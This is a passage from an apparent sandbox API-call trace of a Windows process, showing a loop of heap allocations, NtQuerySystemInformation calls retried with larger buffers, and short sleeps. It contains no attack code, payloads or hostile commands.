RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x29585b8 [0196.519] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0196.519] Sleep (dwMilliseconds=0x110) [0196.549] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x29585b8 [0196.549] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0196.551] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0196.551] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x29585b8 [0196.551] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0196.551] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0196.552] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x29585b8 [0196.552] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0196.552] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0196.552] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x29585b8 [0196.552] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0x0 [0196.553] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0196.553] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x29585b8 [0196.553] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0196.553] Sleep (dwMilliseconds=0x110) [0196.561] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x29585b8 [0196.561] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0196.561] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0196.561] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x29585b8 [0196.561] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0196.562] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0196.562] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x29585b8 [0196.562] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0196.563] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0196.563] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x29585b8 [0196.564] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0x0 [0196.564] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0196.564] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x29585b8 [0196.565] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0196.569] Sleep (dwMilliseconds=0x110) [0196.582] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x29585b8 [0196.582] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0196.583] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0196.583] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x29585b8 [0196.583] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0196.584] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0196.584] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x29585b8 [0196.584] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0196.584] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0196.585] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x29585b8 [0196.585] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0x0 [0196.585] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0196.585] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x29585b8 [0196.586] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0196.586] Sleep (dwMilliseconds=0x110) [0196.601] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x29585b8 [0196.601] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0196.602] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0196.602] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x29585b8 [0196.602] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0196.603] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0196.603] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x29585b8 [0196.603] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0196.604] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0196.604] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x29585b8 [0196.604] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0x0 [0196.604] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0196.604] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x29585b8 [0196.605] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0196.605] Sleep (dwMilliseconds=0x110) [0196.606] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x29585b8 [0196.606] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0196.607] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0196.607] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x29585b8 [0196.607] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0196.608] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0196.608] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x29585b8 [0196.609] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0196.609] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0196.610] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x29585b8 [0196.610] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0x0 [0196.610] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0196.610] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x29585b8 [0196.611] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0196.611] Sleep (dwMilliseconds=0x110) [0196.623] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x29585b8 [0196.623] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0196.624] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0196.624] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x29585b8 [0196.624] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0196.625] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0196.625] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x29585b8 [0196.625] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0196.625] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0196.625] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x29585b8 [0196.625] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0x0 [0196.626] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0196.627] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x29585b8 [0196.628] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0196.628] Sleep (dwMilliseconds=0x110) [0196.638] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x29585b8 [0196.638] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0196.639] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0196.639] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x29585b8 [0196.639] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0196.640] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0196.640] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x29585b8 [0196.640] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0196.641] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0196.641] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x29585b8 [0196.641] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0x0 [0196.642] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0196.642] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x29585b8 [0196.642] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0196.642] Sleep (dwMilliseconds=0x110) [0196.653] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x29585b8 [0196.653] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0196.654] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0196.654] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x29585b8 [0196.654] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0196.655] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0196.655] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x29585b8 [0196.655] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0196.656] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0196.657] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x29585b8 [0196.657] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0x0 [0196.658] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0196.658] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x29585b8 [0196.659] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0196.659] Sleep (dwMilliseconds=0x110) [0196.686] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x29585b8 [0196.686] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0196.686] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0196.686] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x29585b8 [0196.686] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0196.687] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0196.687] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x29585b8 [0196.687] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0196.688] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0196.688] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x29585b8 [0196.688] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0x0 [0196.688] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0196.689] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x29585b8 [0196.690] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0196.690] Sleep (dwMilliseconds=0x110) [0196.731] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x29585b8 [0196.731] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0196.732] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0196.732] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x29585b8 [0196.732] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0196.733] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0196.733] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x29585b8 [0196.734] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0196.734] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0196.734] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x29585b8 [0196.734] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0x0 [0196.735] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0196.735] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x29585b8 [0196.735] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0196.735] Sleep (dwMilliseconds=0x110) [0196.778] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x29585b8 [0196.778] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0196.779] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0196.779] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x29585b8 [0196.779] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0196.780] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0196.780] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x29585b8 [0196.781] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0196.781] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0196.782] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x29585b8 [0196.782] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0x0 [0196.784] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0196.784] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x29585b8 [0196.785] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0196.785] Sleep (dwMilliseconds=0x110) [0196.825] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x29585b8 [0196.825] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0196.826] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0196.826] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x29585b8 [0196.826] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0196.826] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0196.826] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x29585b8 [0196.826] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0196.827] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0196.827] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x29585b8 [0196.827] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0x0 [0196.827] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0196.827] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x29585b8 [0196.828] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0196.828] Sleep (dwMilliseconds=0x110) [0196.858] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x29585b8 [0196.858] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0196.859] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0196.859] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x29585b8 [0196.859] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0196.859] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0196.860] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x29585b8 [0196.860] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0196.860] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0196.860] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x29585b8 [0196.861] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0x0 [0196.861] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0196.861] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x29585b8 [0196.862] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0196.862] Sleep (dwMilliseconds=0x110) [0196.907] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x29585b8 [0196.907] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0196.908] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0196.908] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x29585b8 [0196.908] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0196.909] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0196.909] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x29585b8 [0196.909] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0196.910] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0196.910] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x29585b8 [0196.911] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, 